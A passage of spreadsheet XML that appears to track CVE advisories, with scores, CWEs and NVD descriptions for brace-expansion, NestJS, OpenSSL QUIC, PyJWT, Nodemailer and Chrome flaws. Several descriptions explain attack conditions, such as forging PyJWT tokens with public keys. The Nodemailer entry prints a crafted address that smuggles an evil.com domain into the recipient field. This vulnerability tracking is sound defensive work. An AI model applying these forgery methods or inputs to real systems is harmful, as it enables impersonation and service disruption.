          <t>The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to 1.1.20, 2.1.6, 3.0.8, and 5.0.11, deeply nested brace groups cause expand_() to recurse once per nesting level at comma-member and single-set expansion sites, exhausting the native stack before output limits can apply and potentially terminating the Node.js process. expand_ performs uncontrolled recursion for nested brace alternatives and single-part sets. deeply nested brace groups supplied as an untrusted pattern. expand_ is affected. expand is affected. Comma members is affected. Single set is affected. native stack exhaustion during nested sub-expansion. process-terminating denial of service. This issue is fixed in versions 1.1.20, 2.1.6, 3.0.8, and 5.0.11.</t>
        </is>
      </c>
      <c r="T326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102278</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102281</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K327" s="5" t="inlineStr"/>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q327" s="5" t="inlineStr"/>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-674</t>
        </is>
      </c>
      <c r="S327" s="5" t="inlineStr">
        <is>
          <t>Nest is a framework for building scalable Node.js server-side applications. Prior to 11.2.4 and 12.0.2, a single message with a deeply nested object in its pattern can terminate a NestJS microservice using the TCP or RabbitMQ transport. ServerTCP#handleMessage and ServerRMQ#handleMessage pass a client-controlled non-string pattern to JSON.stringify to derive the handler lookup key; sufficiently deep nesting throws RangeError: Maximum call stack size exceeded, and the unhandled promise rejection terminates Node.js under its default behavior. An attacker who can reach the TCP port or publish to the consumed RabbitMQ queue or exchange can crash the service on demand; other transports are not affected because their patterns arrive as strings. This issue is fixed in versions 11.2.4 and 12.0.2.</t>
        </is>
      </c>
      <c r="T327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102281</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54873</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="inlineStr"/>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K328" s="5" t="inlineStr"/>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q328" s="5" t="inlineStr"/>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S328" s="5" t="inlineStr">
        <is>
          <t>Issue summary: QUIC process may keep memory for QUIC packet
buffer for much longer period than necessary.
Impact summary: Remote peer can exploit this vulnerability
by sending maliciously crafted packets, making the local
QUIC stack to keep the memory for packet buffers allocated.
The time for which the memory remains allocated is entirely
under the control of the potentially malicious remote peer.
CWE: CWE-770: Allocation of Resources Without Limits or Throttling
Description: To save copy operation from the packet buffer to the
stream reassemble buffer the QUIC stack leaves the stream data
on the packet buffer waiting to be copied to a buffer provided
by the local receiving application. The QUIC stack releases
a reference to the packet buffer only after the data are copied
to the application buffer. This design is more efficient for
legitimate data transfers but enables an attacker to allocate a lot
more memory than actually required by the data kept in the receiving
stream buffer.
To mitigate the vulnerability, the QUIC stack now calculates
and monitors memory overhead for every stream. The memory overhead
for a single stream frame is calculated as a difference between the
size of the whole packet that carries the stream frame and the size
of the stream frame itself. The memory overhead for a single stream
frame is added to the total (cumulative) memory overhead QUIC stack
keeps for each stream. Once the cumulative memory overhead exceeds
64kB, the QUIC stack moves the stream frame data from the packet
buffer to the stream buffer, starting with the next packet received.
FIPS impact: no
The FIPS module is not affected as the QUIC implementation is outside of
the OpenSSL FIPS module boundary.</t>
        </is>
      </c>
      <c r="T328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54873</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102266</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr">
        <is>
          <t>python, go, rust</t>
        </is>
      </c>
      <c r="K329" s="5" t="inlineStr"/>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q329" s="5" t="inlineStr"/>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S329" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, HMACAlgorithm.from_jwk is affected because PyJWK verification path used the decoded key without applying prepare_key validation. This occurs when a trusted JWK Set contains an oct entry with an empty k value. As a result, an attacker signs an HMAC token with the same zero-length key accepted by PyJWT. Consequently, forged token can carry arbitrary authenticated claims. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102266</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102267</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr">
        <is>
          <t>python, rust</t>
        </is>
      </c>
      <c r="K330" s="5" t="inlineStr"/>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q330" s="5" t="inlineStr"/>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-345, CWE-918</t>
        </is>
      </c>
      <c r="S330" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT PyJWKClient is affected because redirect destinations are not revalidated against the JWKS trust boundary. This occurs when a configured trusted JWKS endpoint returns an attacker-influenced redirect. As a result, PyJWKClient follows the redirect and consumes the redirected response as key material. Consequently, forwarded credentials may be disclosed or verification keys may be substituted. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102267</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102271</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q331" s="5" t="inlineStr"/>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S331" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.4.0 until 2.14.0, PyJWT HMACAlgorithm.prepare_key is affected because asymmetric-key guard relies on textual markers that are absent from DER encoding. This occurs when an application mixes HMAC and asymmetric algorithms and supplies a DER public key as the shared verification key. As a result, PyJWT uses public DER bytes as an HMAC secret. Consequently, an attacker who knows the public key can forge authenticated HMAC tokens. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102271</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102272</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K332" s="5" t="inlineStr"/>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q332" s="5" t="inlineStr"/>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S332" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, HMACAlgorithm.prepare_key in jwt/algorithms.py is affected because raw-JWK detector does not normalize accepted Unicode byte-order marks before checking for JSON. This occurs when a public JWK is prefixed with a UTF-8 BOM and used in a mixed-algorithm verification path. As a result, public JWK bypasses asymmetric-key detection and becomes the HMAC secret. Consequently, an attacker who knows the public key can forge authenticated tokens. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102272</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102273</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q333" s="5" t="inlineStr"/>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S333" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, PyJWT HMACAlgorithm.prepare_key is affected because HMAC key guard only recognizes top-level public JWK forms and misses container representations. This occurs when an application allows HMAC and asymmetric algorithms and passes a public JWK container as the raw key. As a result, public asymmetric key material is accepted as the HMAC secret. Consequently, an attacker who knows the public key can forge a token with arbitrary authenticated claims. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102273</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100699</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q334" s="5" t="inlineStr"/>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S334" s="5" t="inlineStr">
        <is>
          <t>Nodemailer is a Node.js email-sending library. In versions &gt;= 9.1.0 and &lt; 10.0.9, the address parser (src/addressparser) mishandles addresses whose local-part is a quoted string and that are followed by RFC 5322 comments, allowing trailing comment-separated domain atoms to be retained in the normalized address. For example, the input "user"@example.com(x)evil.com is parsed to the address value 'user@example.com evil.com', which contains additional attacker-controlled domain text separated by a literal space. This parsed value is used without further strict recipient validation when the message envelope is built (envelope.to in src/mime-node), so a malformed/ambiguous recipient address can be accepted and placed in the SMTP envelope. Whether this results in delivery to an unintended recipient on real SMTP servers has not been confirmed. The issue is a variant of the RFC 5322 comment parsing problem addressed in GHSA-cc9r-2j5m-2m83, affecting the separate quoted-local-part code path. Version 10.0.9 contains a fix.</t>
        </is>
      </c>
      <c r="T334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100699</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97688</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="inlineStr"/>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr">
        <is>
          <t>urllib3</t>
        </is>
      </c>
      <c r="K335" s="5" t="inlineStr"/>
      <c r="L335" s="5" t="inlineStr">
        <is>
          <t>pip:urllib3</t>
        </is>
      </c>
      <c r="M335" s="5" t="inlineStr">
        <is>
          <t>2.8.0</t>
        </is>
      </c>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr"/>
      <c r="P335" s="5" t="inlineStr"/>
      <c r="Q335" s="5" t="inlineStr"/>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="S335"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335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97688</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102310</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="inlineStr"/>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K336" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q336" s="5" t="inlineStr"/>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S336" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Payments in Google Chrome prior to 154.0.8037.92 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102310</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102320</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="inlineStr"/>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K337" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q337" s="5" t="inlineStr"/>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S337" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in CORS in Google Chrome prior to 154.0.8037.92 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102320</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102330</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="inlineStr"/>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K338" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q338" s="5" t="inlineStr"/>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S338" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in SiteIsolation in Google Chrome prior to 154.0.8037.92 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102330</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95297</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="inlineStr"/>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q339" s="5" t="inlineStr"/>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S339" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Contextual Tasks in Google Chrome prior to 154.0.8037.57 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95297</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95330</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="inlineStr"/>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K340" s="5" t="inlineStr"/>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q340" s="5" t="inlineStr"/>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="S340" s="5" t="inlineStr">
        <is>
          <t>Improper state validation in Downloads in Google Chrome prior to 154.0.8037.57 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95330</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95366</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
